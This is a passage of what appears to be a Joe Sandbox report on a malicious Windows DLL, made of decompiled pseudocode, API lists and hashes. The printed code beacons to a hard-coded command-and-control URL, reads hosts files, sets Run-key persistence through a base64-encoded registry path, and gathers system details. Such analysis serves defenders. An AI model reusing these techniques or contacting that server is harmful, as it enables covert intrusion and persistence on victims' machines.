            					_t48 = E1000591C(_t132); // executed
            					if(_t48 != 0) {
            						goto L3;
            					}
            					_t49 = E1000591C(_t118); // executed
            					if(_t49 == 0) {
            						_v268 = _v268 & 0x00000000;
            						_t100 = 0x40;
            						_v528 = _v528 & 0x00000000;
            						memset( &_v267, 0, _t100 << 2);
            						asm("stosw");
            						asm("stosb");
            						__eflags = 0;
            						_t102 = 0x40;
            						_t53 = memset( &_v527, 0, 0 << 2);
            						asm("stosw");
            						E100268BC(_t53,  &_v527 + _t102);
            						asm("stosb");
            						 *_t132( &_v268, 0x104, _t53);
            						 *_t132( &_v528, 0x104);
            						_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
            						E1000CD08(0,  &_v268);
            						_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
            						_t65 = E1000CCAE(E1000CD08(0,  &_v528), _t94, 0, _t116, 0x104, 0x80000, _t134, __eflags, _t146, 0x80000); // executed
            						_t138 =  &(_t135[0xd]);
            						_t95 = _t65;
            						while(1) {
            							_v1808 = _v1808 & 0x00000000;
            							memset( &_v1807, 0, 0xff << 2);
            							_v784 = _v784 & 0x00000000;
            							asm("stosw");
            							asm("stosb");
            							memset( &_v783, 0, 0 << 2);
            							_t140 =  &(_t138[6]);
            							asm("stosw");
            							asm("stosb");
            							_t71 = E10005C4C( &_v784, 0x100); // executed
            							__eflags = _t71;
            							_t109 = 0x3f;
            							if(__eflags == 0) {
            								_push("http://107.163.56.232:18963/main.php");
            							} else {
            								_push( &_v784);
            							}
            							_push("%s");
            							_push( &_v1808);
            							E10003EF4();
            							_push(0x80000);
            							_push(0);
            							E1000CCFC(_t95, _t109, 0x80000, _t134, __eflags, _t95);
            							_t76 = E100061BD(_t109, 0x80000, __eflags, _t146,  &_v1808, _t95, 0x80000); // executed
            							_t138 =  &(_t140[9]);
            							__eflags = _t76 - 7;
            							_v8 = _t76;
            							if(__eflags > 0) {
            								goto L11;
            							}
            							_push("iOffset");
            							_push("c:\\1.txt"); // executed
            							L10004139(_t109, _t116, __eflags, _t146); // executed
            							L10:
            							Sleep( *0x10012500); // executed
            							continue;
            							L11:
            							_t110 = 0;
            							__eflags = _t76;
            							if(_t76 <= 0) {
            								L16:
            								_push(_t95);
            								__eflags = E1000CD02(_t110, 0x80000) - 0x10;
            								if(__eflags <= 0) {
            									wsprintfA(0x10016ae0, "%s", _t95);
            									_v5904 = _v5904 & 0x00000000;
            									memset( &_v5903, 0, 0x3ff << 2);
            									asm("stosw");
            									asm("stosb");
            									E10005318(0, __eflags,  &_v5904);
            									E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v268);
            									E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v528);
            									_push(_t95);
            									_push(0x10016ae0);
            									E1000CDF2(0x80000);
            									_t138 =  &(_t138[0xd]);
            								}
            								goto L10;
            							} else {
            								goto L12;
            							}
            							do {
            								L12:
            								_t90 = _t110;
            								asm("cdq");
            								_t130 = 2;
            								_t116 = _t90 % _t130;
            								__eflags = _t90 % _t130;
            								if(_t90 % _t130 == 0) {
            									_t32 = _t110 + _t95;
            									 *_t32 =  *(_t110 + _t95) + 0x4b;
            									__eflags =  *_t32;
            								} else {
            									 *(_t110 + _t95) =  *(_t110 + _t95) + 0x3a;
            								}
            								_t110 = _t110 + 1;
            								__eflags = _t110 - _v8;
            							} while (_t110 < _v8);
            							goto L16;
            						}
            					}
            					L3:
            					Sleep(0xea60);
            				}
            			}







































            0x10006ef7
            0x10006efc
            0x10006f09
            0x10006f0b
            0x10006f12
            0x10006f18
            0x10006f1a
            0x10006f1b
            0x10006f23
            0x00000000
            0x00000000
            0x10006f26
            0x10006f2e
            0x10006f3d
            0x10006f46
            0x10006f4f
            0x10006f56
            0x10006f58
            0x10006f5a
            0x10006f5d
            0x10006f5f
            0x10006f66
            0x10006f68
            0x10006f6b
            0x10006f70
            0x10006f7e
            0x10006f88
            0x10006f94
            0x10006f9c
            0x10006fab
            0x10006fbe
            0x10006fc3
            0x10006fc6
            0x10006fc8
            0x10006fc8
            0x10006fdc
            0x10006fde
            0x10006fe7
            0x10006fe9
            0x10006ff8
            0x10006ff8
            0x10006ffa
            0x10006ffc
            0x10007004
            0x1000700a
            0x1000700c
            0x1000700d
            0x10007018
            0x1000700f
            0x10007015
            0x10007015
            0x10007023
            0x10007028
            0x10007029
            0x10007031
            0x10007032
            0x10007035
            0x10007043
            0x10007048
            0x1000704b
            0x1000704e
            0x10007051
            0x00000000
            0x00000000
            0x10007053
            0x10007058
            0x1000705d
            0x10007064
            0x1000706a
            0x00000000
            0x10007075
            0x10007075
            0x10007077
            0x10007079
            0x10007097
            0x10007097
            0x1000709d
            0x100070a1
            0x100070ae
            0x100070b4
            0x100070c8
            0x100070ca
            0x100070cc
            0x100070d4
            0x100070e7
            0x100070fa
            0x100070ff
            0x10007100
            0x10007105
            0x1000710a
            0x1000710a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x1000707b
            0x1000707b
            0x1000707b
            0x1000707f
            0x10007080
            0x10007081
            0x10007083
            0x10007085
            0x1000708d
            0x1000708d
            0x1000708d
            0x10007087
            0x10007087
            0x10007087
            0x10007091
            0x10007092
            0x10007092
            0x00000000
            0x1000707b
            0x10006fc8
            0x10006f30
            0x10006f35
            0x10006f35

            APIs
            • Sleep.KERNEL32(0000EA60), ref: 10006F35
            • Sleep.KERNEL32 ref: 1000706A
            • wsprintfA.USER32 ref: 100070AE
            • PrintFile.ABC(00000000,?,00000000), ref: 100070E7
            • PrintFile.ABC(00000000,?,00000000,?,00000000), ref: 100070FA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: FilePrintSleep$wsprintf
            • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
            • API String ID: 1547040302-1685166179
            • Opcode ID: 98aa69a6f984e71f9bd2625cd89ddf0c92c8ddd1c0c6d5115167c38e8364c081
            • Instruction ID: 3d380b1aca1ede5b104bd14f8e69b562dc8f53a9395fdf47d07c0f5b95106c5e
            • Opcode Fuzzy Hash: 98aa69a6f984e71f9bd2625cd89ddf0c92c8ddd1c0c6d5115167c38e8364c081
            • Instruction Fuzzy Hash: 2651C8B6D04359AAFB21D774CC45FCF77ACEF08381F2045A6F208E6086DA75AB848E55
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 153 10006499-10006530 call 1000cda0 call 1000ccfc call 10001000 wsprintfA call 1000ccae call 1000ccfc call 10003f0a 166 10006536-10006546 call 10003f24 153->166 167 1000677e-10006780 153->167 170 1000654b-10006553 166->170 168 100066d0-100066de 167->168 170->167 171 10006559-1000658a call 10031a47 call 1000cd02 call 100405c2 170->171 178 1000658f-100065b0 call 1000ccfc call 10003f41 171->178 183 100065b6-100065b9 178->183 184 10006647-1000669c call 1000cd02 call 1003f4fc call 1000cd02 call 100346b9 call 10024f30 178->184 183->184 185 100065bf-10006642 MultiByteToWideChar call 1000ccae MultiByteToWideChar call 10034086 call 1000ccae call 10028111 call 1000cca8 call 1000cd02 call 1002948e call 1000cca8 183->185 206 100066a4-100066ae call 1000cd02 184->206 207 1000669e 184->207 185->178 213 100066b0-100066cc call 1002c073 call 1002c51a 206->213 214 100066df-100066fa wsprintfA call 1000cd02 206->214 207->206 213->168 221 100066fc-100066fe 214->221 224 10006700-10006706 221->224 225 10006721-10006737 call 1000cca8 call 1002377a 221->225 227 10006718 224->227 228 10006708-10006716 224->228 234 10006761-1000676f call 100313b9 225->234 235 10006739-1000675c call 1003fb77 call 10025ccd 225->235 230 1000671b-1000671f 227->230 228->230 230->221 241 10006771-1000677d call 10022346 234->241 242 100067db-100067dc 234->242 235->168 241->167 249 100067b2-100067d2 call 10034443 241->249 245 100067e1-1000680e call 1000ccfc call 10029ccc 242->245 254 10006810-1000682d call 1000cd50 245->254 255 1000682f-1000683b call 1002fabf 245->255 256 100067d4-100067d6 249->256 257 100067d8 249->257 254->245 260 1000683c-1000683f 255->260 256->260 257->242
            C-Code - Quality: 41%
            			E10006499(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
            				CHAR* _t30;
            				intOrPtr _t33;
            				intOrPtr _t37;
            				void* _t42;
            				signed int _t46;
            				void* _t51;
            				void* _t54;
            				void* _t55;
            				intOrPtr _t60;
            				void* _t61;
            				void* _t62;
            
            				_t70 = __eflags;
            				_t52 = __edx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				_push(__ebx);
            				_push(__esi);
            				_push(__edi);
            				 *((intOrPtr*)(_t61 - 0x10)) = _t62 - 0x13c;
            				_t46 = 0x3f;
            				_t54 = _t61 - 0x147;
            				 *(_t61 - 0x148) = 0;
            				memset(_t54, 0, _t46 << 2);
            				_t55 = _t54 + _t46;
            				asm("stosw");
            				asm("stosb");
            				_push(0x100);
            				_push(0);
            				 *((intOrPtr*)(_t61 - 0x20)) = 0;
            				 *((intOrPtr*)(_t61 - 4)) = 0;
            				E1000CCFC(0, 0, __esi, _t61, _t70, _t61 - 0x148);
            				_t30 = E10001000(0, _t70, __fp0, "aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw=="); // executed
            				_t33 = E1000CCAE(wsprintfA(_t61 - 0x148, _t30,  *((intOrPtr*)(_t61 + 8))), 0, 0, _t52, _t55, 0x7d000, _t61, _t70, __fp0, 0x7d000); // executed
            				 *((intOrPtr*)(_t61 + 8)) = _t33;
            				_push(0x7d000);
            				_push(0);
            				E1000CCFC(0, 0, 0x7d000, _t61, _t70, _t33);
            				 *((intOrPtr*)(_t61 - 0x24)) = 0x1388;
            				if(E10003F0A("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)", 0, 0, 0, 0) == 0) {
            					L6:
            					__eflags = 0;
            					asm("invalid");
            					asm("invalid");
            					__ecx =  *((intOrPtr*)(__ebp - 0xc));
            					_pop(__edi);
            					_pop(__esi);
            					 *[fs:0x0] =  *((intOrPtr*)(__ebp - 0xc));
            					_pop(__ebx);
            					__esp = __ebp;
            					_pop(__ebp);
            					return 0;
            				} else {
            					_t37 = E10003F24(_t35, _t61 - 0x148, 0, 0, 0x4000000, 0); // executed
            					_t72 = _t37;
            					 *((intOrPtr*)(_t61 - 0x38)) = _t37;
            					if(_t37 == 0) {
            						goto L6;
            					} else {
            						 *((char*)(_t61 - 0x34)) =  *((intOrPtr*)(_t61 + 0xb));
            						0x10031a47(0);
            						_t51 = _t61 - 0x34;
            						0x100405c2(0, 0x10017b9c, E1000CD02(_t61 - 0x34, 0x10017b9c), 0x10017b9c, _t55);
            						_t60 =  *0x1000e0fc;
            						 *((char*)(_t61 - 4)) = 1;
            						_push(4);
            						_push(0);
            						E1000CCFC(0, _t51, _t60, _t61, _t72,  *((intOrPtr*)(_t61 + 8)));
            						_t42 = E10003F41( *((intOrPtr*)(_t61 - 0x38)),  *((intOrPtr*)(_t61 + 8)), 4, _t61 - 0x24);
            						asm("les ebx, [ebx+edi]");
            						return _t42;
            					}
            				}
            			}














            0x10006499
            0x10006499
            0x1000649e
            0x100064a9
            0x100064aa
            0x100064ab
            0x100064ae
            0x100064b3
            0x100064b6
            0x100064bc
            0x100064c2
            0x100064c2
            0x100064c4
            0x100064c6
            0x100064c7
            0x100064d2
            0x100064d4
            0x100064d7
            0x100064da
            0x100064e4
            0x10006503
            0x1000650b
            0x1000650e
            0x1000650f
            0x10006511
            0x1000651f
            0x10006530
            0x1000677e
            0x1000677e
            0x10006782
            0x10006784
            0x100066d0
            0x100066d3
            0x100066d4
            0x100066d5
            0x100066dc
            0x100066dd
            0x100066dd
            0x100066de
            0x10006536
            0x10006546
            0x1000654e
            0x10006550
            0x10006553
            0x00000000
            0x10006559
            0x10006560
            0x10006563
            0x10006577
            0x1000657b
            0x10006580
            0x10006586
            0x1000658f
            0x10006591
            0x10006595
            0x100065a6
            0x100065ac
            0x100065af
            0x100065af
            0x10006553

            APIs
            • wsprintfA.USER32 ref: 100064F7
              • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,FFFFFAE1,FFFFFAE1,10006ED5), ref: 10003F1C
            • ___crtGetTimeFormatEx.LIBCMT ref: 10006546
              • Part of subcall function 10003F24: InternetOpenUrlA.WININET(80000100,00000000,00000000,?,00000000,100062C4), ref: 10003F39
              • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF), ref: 100065C8
            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00000000,?,?,?,?,000000FF), ref: 100065E6
            • wsprintfA.USER32 ref: 100066E9
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
            • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
            • API String ID: 4077377486-2496724313
            • Opcode ID: c7eb83e4b2cbe741532e4934f3a97faadb23b47bf3999cf201c01ff8ac9ac8d2
            • Instruction ID: 6ddd42a7c2557d202ec314d980cd11a7fac2ec9c5269aac7b6a1c26b14e4e3ef
            • Opcode Fuzzy Hash: c7eb83e4b2cbe741532e4934f3a97faadb23b47bf3999cf201c01ff8ac9ac8d2
            • Instruction Fuzzy Hash: D0A1D5B680124DBFFB11DBA4DC82EEF7B7DDF08394F204065F904A6186DA756E448BA1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 60%
            			E10006D08(void* __eflags, void* __fp0) {
            				char _v8;
            				char _v12;
            				void _v271;
            				char _v272;
            				void _v531;
            				char _v532;
            				void* __esi;
            				void* _t21;
            				signed int _t34;
            				CHAR* _t44;
            				void* _t50;
            
            				_t50 = __eflags;
            				_t34 = 0x40;
            				_v532 = 0;
            				memset( &_v531, 0, _t34 << 2);
            				asm("stosw");
            				asm("stosb");
            				_t44 = "C:\\Users\\alfons\\Desktop\\abc.dll";
            				E10003FF7(_t44,  &_v532, 0x104);
            				_t21 = E10001000(0, _t50, __fp0, "U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg=="); // executed
            				E1000406C(0x80000001, _t21, 0, "REG_SZ", 0, 0xf003f, 0,  &_v8,  &_v12); // executed
            				_push(0x40);
            				_v272 = 0;
            				memset( &_v271, 0, 0 << 2);
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v272, "%s \"%s\",Dispatch", "C:\\Windows\\SysWOW64\\rundll32.exe", _t44);
            				_push( &_v272);
            				E100040D4(_v8, "Disp", 0, 1,  &_v272, E1000CD02(0, _t44) + 1); // executed
            				return E10004092(_v8);
            			}














            0x10006d08
            0x10006d18
            0x10006d21
            0x10006d2c
            0x10006d2e
            0x10006d30
            0x10006d37
            0x10006d3e
            0x10006d60
            0x10006d6c
            0x10006d71
            0x10006d7c
            0x10006d83
            0x10006d85
            0x10006d87
            0x10006d99
            0x10006da5
            0x10006dbf
            0x10006dd4

            APIs
              • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
              • Part of subcall function 1000406C: RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D71,?,10006D71,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
            • wsprintfA.USER32 ref: 10006D99
            • ___crtGetTimeFormatEx.LIBCMT ref: 10006DBF
              • Part of subcall function 100040D4: RegSetValueExA.KERNEL32(00000001,?,00000001,00000000,?,?,?,10006DC4,?,Disp,00000000,00000001,?,00000001,?), ref: 100040E9
              • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DCF,?), ref: 10004096
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
            • String ID: %s "%s",Dispatch$C:\Users\user\Desktop\abc.dll$C:\Windows\SysWOW64\rundll32.exe$Disp$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
            • API String ID: 1762869224-450200599
            • Opcode ID: aa7cbceaa3ed7cb5634bd50f743bbd192579eebf85e8bd443ae8d9d99b182fa9
            • Instruction ID: 37d86c3d472a3d605e7482a7a14943cafe3984fcf04a0d8964f0c82a610850ab
            • Opcode Fuzzy Hash: aa7cbceaa3ed7cb5634bd50f743bbd192579eebf85e8bd443ae8d9d99b182fa9
            • Instruction Fuzzy Hash: 7D11B2B694421CBEFB11D7A4DC86FEA776CDB14344F1404B1F704BA085DAB16FC88AA4
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 276 26e0cdd-26e0d0b 277 26e0d0d-26e0d12 276->277 278 26e0d22-26e0d72 call 26e0e75 VirtualAlloc call 26e1150 276->278 277->278 279 26e0d14-26e0d20 277->279 284 26e0e0c-26e0e20 MessageBoxA ExitProcess 278->284 285 26e0d78-26e0d97 call 26e10ae call 26e0fc9 call 26e0ecf 278->285 279->278 292 26e0d9d-26e0da9 call 26e131c 285->292 293 26e0e26-26e0e2f 285->293 292->293 300 26e0dab-26e0db9 292->300 295 26e0e46-26e0e74 call 26e1496 VirtualFree 293->295 296 26e0e31-26e0e43 293->296 296->295 301 26e0dbb-26e0dc1 300->301 302 26e0dc3-26e0dc9 300->302 303 26e0df0-26e0e00 wsprintfA 301->303 304 26e0dcb-26e0de7 302->304 305 26e0de9-26e0def 302->305 306 26e0e06 303->306 304->306 305->303 306->284
            APIs
            • VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,026E1600,?,?,?,?), ref: 026E0D5C
            • wsprintfA.USER32(?,?,?,?), ref: 026E0E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 026E0E18
            • ExitProcess.KERNEL32(00000000), ref: 026E0E20
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd
            Similarity
            • API ID: AllocExitMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 1926473177-4208015514
            • Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction ID: e74489fce6e4d2b300eaed3c8e829687511ad7ae635bcff7a7829ab472e01b1f
            • Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction Fuzzy Hash: 3E417D322427469FEB38DF14CC84FEB73A5AF44351F04411CED4AA7685EBB1B8118B94
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 62%
            			E10005DB4(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
            				char _v3;
            				char _v8;
            				intOrPtr _v12;
            				char _v16;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				char _v80;
            				void _v128;
            				void _v383;
            				signed char _v384;
            				char _v644;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				void* _t31;
            				void* _t44;
            				signed short _t49;
            				void* _t54;
            				signed int _t59;
            				void* _t62;
            				void* _t63;
            				signed int _t64;
            				void* _t67;
            				void* _t70;
            				intOrPtr _t71;
            				void* _t74;
            				void* _t77;
            				intOrPtr _t78;
            				char* _t81;
            				void* _t88;
            
            				_t88 = __eflags;
            				_t70 = __edx;
            				_t59 = 0xc;
            				_t77 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
            				_t31 = memcpy( &_v128, _t77, _t59 << 2);
            				_t74 = _t77 + _t59 + _t59;
            				0x10032624(0x80000002,  &_v128, 0, 0xf003f,  &_v8);
            				asm("sbb [ebp-0x72b68a40], al");
            				_t81 =  &_v3;
            				asm("clc");
            				_v16 = 4;
            				_v12 = 0xc8;
            				E1000409D(_v8, "ProcessorNameString", 0,  &_v16,  &_v644, _t31); // executed
            				E10004092(_v8);
            				_t78 = _a4;
            				_push( &_v644);
            				E1000CD0E(0, _t78);
            				E100058A4(0, _t78);
            				_t13 = _t78 + 0x60; // 0x128
            				E10005ACA(_t88, _t13);
            				_pop(_t62);
            				_v80 = 0x40;
            				E1002BB01( &_v80, __ebx, _t62, _t70, _t74, _t78, _t88); // executed
            				_t71 = _v68;
            				_t63 = 0x14;
            				_t44 = E1000CDB0(_v72, _t63, _t71);
            				asm("adc edx, 0x0");
            				_t18 = _t78 + 0x40; // 0x108
            				E10003EF4(_t18, "%u MB", _t44 + 1);
            				_t19 = _t78 + 0x80; // 0x148
            				_t49 = E1000CD0E(_t63, _t19);
            				0x1003e508("12071239", _t71, _t81,  &_v80);
            				_v384 = _v384 & 0x00000000;
            				 *(_t78 + 0x120) = _t49 & 0x0000ffff;
            				_t64 = 0x3f;
            				memset( &_v383, 0, _t64 << 2);
            				 *(_t78 + 0x124) =  *(_t78 + 0x124) | 0xffffffff;
            				asm("stosw");
            				asm("stosb");
            				_t54 = E10005CF7( &_v384, 0x100); // executed
            				_t67 = _t81;
            				if(_t54 == 0) {
            					__eflags = _t78 + 0xa0;
            					return E10003EF4(_t78 + 0xa0, "%s", "http://107.163.56.232:18963/main.php");
            				}
            				_push( &_v384);
            				return E1000CD0E(_t67, _t78 + 0xa0);
            			}

































            0x10005db4
            0x10005db4
            0x10005dc4
            0x10005dc5
            0x10005dd9
            0x10005dd9
            0x10005de0
            0x10005de5
            0x10005deb
            0x10005dec
            0x10005ded
            0x10005e07
            0x10005e11
            0x10005e19
            0x10005e1e
            0x10005e27
            0x10005e29
            0x10005e44
            0x10005e49
            0x10005e4d
            0x10005e56
            0x10005e57
            0x10005e60
            0x10005e68
            0x10005e6d
            0x10005e6e
            0x10005e76
            0x10005e7b
            0x10005e84
            0x10005e89
            0x10005e95
            0x10005e9e
            0x10005ea3
            0x10005eaf
            0x10005eb5
            0x10005ebe
            0x10005ec0
            0x10005ecc
            0x10005ece
            0x10005ed6
            0x10005ede
            0x10005edf
            0x10005efd
            0x00000000
            0x10005f0e
            0x10005eed
            0x00000000

            APIs
            • ___crtGetTimeFormatEx.LIBCMT ref: 10005E11
              • Part of subcall function 1000409D: RegQueryValueExA.KERNEL32(?,?,?,?,?,?), ref: 100040B2
              • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DCF,?), ref: 10004096
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CloseFormatQueryTimeValue___crt
            • String ID: %u MB$12071239$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
            • API String ID: 271660946-279254293
            • Opcode ID: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
            • Instruction ID: 4b44d42b6dd2e917ab233586d3a99f6710c87f88ea92407307b6f82172be36f0
            • Opcode Fuzzy Hash: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
            • Instruction Fuzzy Hash: 2531C2B680460CBAFB21C764DC42FDF77BCEB04340F14456AF658BA082EB75BA498B55
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 41%
            			E1000827D() {
            				signed int _v8;
            				void _v267;
            				signed char _v268;
            				void _v527;
            				signed char _v528;
            				char _v783;
            				signed char _v784;
            				void _v1807;
            				signed char _v1808;
            				void* _t44;
            				void* _t50;
            				void* _t56;
            				signed int _t61;
            				signed int _t67;
            				void* _t70;
            				void* _t71;
            				signed int _t72;
            				void* _t78;
            				void* _t81;
            				signed int _t82;
            				void* _t83;
            				void* _t94;
            				signed int _t95;
            				intOrPtr* _t96;
            				void* _t98;
            				void* _t99;
            				void* _t102;
            				void* _t104;
            				void* _t109;
            
            				_v268 = _v268 & 0x00000000;
            				_t72 = 0x40;
            				memset( &_v267, 0, _t72 << 2);
            				_v528 = _v528 & 0x00000000;
            				asm("stosw");
            				asm("stosb");
            				memset( &_v527, E1002ED85(_t96, _t98), 0 << 2);
            				asm("stosw");
            				asm("stosb");
            				 *_t96( &_v268, 0x104, _t98, 0x40);
            				 *_t96( &_v528, 0x104);
            				_t44 = E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3Rz"); // executed
            				_push(_t44);
            				E1000CD08(0,  &_v268);
            				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
            				_t50 = E1000CCAE(E1000CD08(0,  &_v528), _t70, 0, _t86, 0x104, 0x80000, _t98, 0, _t109, 0x80000); // executed
            				_t102 = _t99 + 0x34;
            				_t71 = _t50;
            				while(1) {
            					_v1808 = _v1808 & 0x00000000;
            					memset( &_v1807, 0, 0xff << 2);
            					_v784 = _v784 & 0x00000000;
            					asm("stosw");
            					asm("stosb");
            					_t78 = 0x3f;
            					_t94 =  &_v783;
            					memset(_t94, 0, 0 << 2);
            					_t104 = _t102 + 0x18;
            					_t95 = _t94 + _t78;
            					asm("stosw");
            					asm("stosb");
            					_t56 = E10005C4C( &_v784, 0x100); // executed
            					_t107 = _t56;
            					_pop(_t81);
            					if(_t56 == 0) {
            						_push("http://107.163.56.232:18963/main.php");
            					} else {
            						_push( &_v784);
            					}
            					_push("%s");
            					_push( &_v1808);
            					E10003EF4();
            					_push(0x80000);
            					_push(0);
            					E1000CCFC(_t71, _t81, 0x80000, _t98, _t107, _t71);
            					_t61 = E100061BD(_t81, 0x80000, _t107, _t109,  &_v1808, _t71, 0x80000); // executed
            					_t102 = _t104 + 0x24;
            					_v8 = _t61;
            					if(_t61 > 7) {
            						goto L6;
            					}
            					L5:
            					Sleep( *0x10012500); // executed
            					continue;
            					L6:
            					_t82 = 0;
            					__eflags = _t61;
            					if(_t61 <= 0) {
            						L11:
            						__eflags = E1000CD02(_t82, 0x80000) - 0x10;
            						_t83 = _t71;
            						if(__eflags <= 0) {
            							_t95 = 0x10016ae0;
            							_push(_t71);
            							__eflags = E1000CDF2(0x80000);
            							_t83 = 0x10016ae0;
            							if(__eflags != 0) {
